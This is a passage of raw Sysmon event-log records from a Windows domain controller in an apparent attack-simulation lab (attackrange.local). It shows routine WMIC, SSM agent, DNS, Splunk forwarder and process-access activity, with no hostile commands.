12:01:03.060{266CAFBE-647F-6064-4C00-00000000AE01}3864C:\Windows\System32\wbem\WMIC.exe10.0.14393.0 (rs1_release.160715-1616)WMI Commandline UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationwmic.exewmic OS get Version /format:listC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 18141800x80000000000000002307Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-ConnectPipe2021-03-31 12:01:03.050{266CAFBE-647E-6064-4300-00000000AE01}3924\Amazon\SSM\InstanceData\healthC:\Program Files\Amazon\SSM\ssm-agent-worker.exe 18141800x80000000000000002306Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-ConnectPipe2021-03-31 12:01:03.050{266CAFBE-647E-6064-4300-00000000AE01}3924\Amazon\SSM\InstanceData\terminationC:\Program Files\Amazon\SSM\ssm-agent-worker.exe 17141700x80000000000000002305Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:01:03.048{266CAFBE-647E-6064-4300-00000000AE01}3924\Amazon\SSM\InstanceData\testPipeC:\Program Files\Amazon\SSM\ssm-agent-worker.exe 10341000x80000000000000002304Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.029{266CAFBE-646C-6064-1000-00000000AE01}11242240C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+261b7|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002303Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.029{266CAFBE-646C-6064-1000-00000000AE01}11242240C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+25d35|C:\Windows\system32\wbem\wmiprvsd.dll+2619d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000002302Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.028{266CAFBE-646C-6064-1000-00000000AE01}11242240C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000002301Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.028{266CAFBE-646C-6064-1000-00000000AE01}11242240C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002300Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.027{266CAFBE-646C-6064-1000-00000000AE01}11242240C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+264a1|C:\Windows\system32\wbem\wmiprvsd.dll+2669f|C:\Windows\system32\wbem\wmiprvsd.dll+25c4b|C:\Windows\system32\wbem\wmiprvsd.dll+27476|C:\Windows\system32\wbem\wmiprvsd.dll+27db2|C:\Windows\system32\wbem\wmiprvsd.dll+277c9|C:\Windows\system32\wbem\wmiprvsd.dll+26100|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000002299Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.027{266CAFBE-646C-6064-1000-00000000AE01}11242240C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+264a1|C:\Windows\system32\wbem\wmiprvsd.dll+2669f|C:\Windows\system32\wbem\wmiprvsd.dll+25c4b|C:\Windows\system32\wbem\wmiprvsd.dll+27476|C:\Windows\system32\wbem\wmiprvsd.dll+27db2|C:\Windows\system32\wbem\wmiprvsd.dll+277c9|C:\Windows\system32\wbem\wmiprvsd.dll+26100|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000002298Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.022{266CAFBE-647D-6064-3100-00000000AE01}26723308C:\Windows\system32\DFSRs.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmidcprv.dll+163a4|C:\Windows\system32\wbem\wmidcprv.dll+166e0|C:\Windows\system32\wbem\wmidcprv.dll+abad|C:\Windows\system32\wbem\wmidcprv.dll+b57e|C:\Windows\system32\wmidcom.dll+58a6|C:\Windows\system32\wmidcom.dll+5464|C:\Windows\system32\wmidcom.dll+5495|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002297Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.005{266CAFBE-646C-6064-1000-00000000AE01}11242240C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+261b7|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002296Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.004{266CAFBE-646C-6064-1000-00000000AE01}11242240C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+25d35|C:\Windows\system32\wbem\wmiprvsd.dll+2619d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000002295Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.004{266CAFBE-646C-6064-1000-00000000AE01}11242240C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000002294Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.004{266CAFBE-646C-6064-1000-00000000AE01}11242240C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002293Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.004{266CAFBE-646C-6064-1000-00000000AE01}11242240C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+5a1b8|C:\Windows\system32\wbem\wmiprvsd.dll+35a49|C:\Windows\system32\wbem\wmiprvsd.dll+2807f|C:\Windows\system32\wbem\wmiprvsd.dll+29591|C:\Windows\system32\wbem\wmiprvsd.dll+292c2|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002292Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.002{266CAFBE-646C-6064-1000-00000000AE01}11242240C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+264a1|C:\Windows\system32\wbem\wmiprvsd.dll+2669f|C:\Windows\system32\wbem\wmiprvsd.dll+25c4b|C:\Windows\system32\wbem\wmiprvsd.dll+27476|C:\Windows\system32\wbem\wmiprvsd.dll+27db2|C:\Windows\system32\wbem\wmiprvsd.dll+277c9|C:\Windows\system32\wbem\wmiprvsd.dll+26100|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000002291Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.999{266CAFBE-647D-6064-3100-00000000AE01}26723236C:\Windows\system32\DFSRs.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmidcprv.dll+163a4|C:\Windows\system32\wbem\wmidcprv.dll+166e0|C:\Windows\system32\wbem\wmidcprv.dll+abad|C:\Windows\system32\wbem\wmidcprv.dll+b57e|C:\Windows\system32\DFSRs.exe+d847d|C:\Windows\system32\DFSRs.exe+c3ca|C:\Windows\system32\DFSRs.exe+51c1|C:\Windows\system32\DFSRs.exe+73b2|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002507Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.987{266CAFBE-6480-6064-5700-00000000AE01}30083748C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000002506Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.403{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local53domainfalse127.0.0.1win-dc-892.attackrange.local64138- 354300x80000000000000002505Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.402{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local49695-false169.254.169.254-80http 354300x80000000000000002504Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.400{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local49694-false169.254.169.254-80http 354300x80000000000000002503Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.203{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local49693-false169.254.169.254-80http 354300x80000000000000002502Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.090{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local49692-false169.254.169.254-80http 354300x80000000000000002501Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.047{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local49691-false169.254.169.254-80http 354300x80000000000000002500Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.045{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local49690-false169.254.169.254-80http 354300x80000000000000002499Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.042{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local49689-false169.254.169.254-80http 354300x80000000000000002498Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.038{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local49688-false169.254.169.254-80http 354300x80000000000000002497Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.035{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local49687-false169.254.169.254-80http 354300x80000000000000002496Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.817{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local53domainfalse127.0.0.1win-dc-892.attackrange.local54221- 354300x80000000000000002495Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.723{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local64876- 354300x80000000000000002494Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.636{266CAFBE-6467-6064-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMtcpfalsefalse46.128.24.64-53859-false10.0.1.14win-dc-892.attackrange.local5986- 354300x80000000000000002493Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.496{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local53domainfalse127.0.0.1win-dc-892.attackrange.local65022- 354300x80000000000000002492Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.496{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue7f00:1:0:0:98d0:c4a5:d9d:ffff-65022-true7f00:1:2c1b:100:60e6:0:86e6:0-53domain 354300x80000000000000002491Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.408{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local64138- 10341000x80000000000000002490Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.721{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6480-6064-5700-00000000AE01}3008C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002489Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002488Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 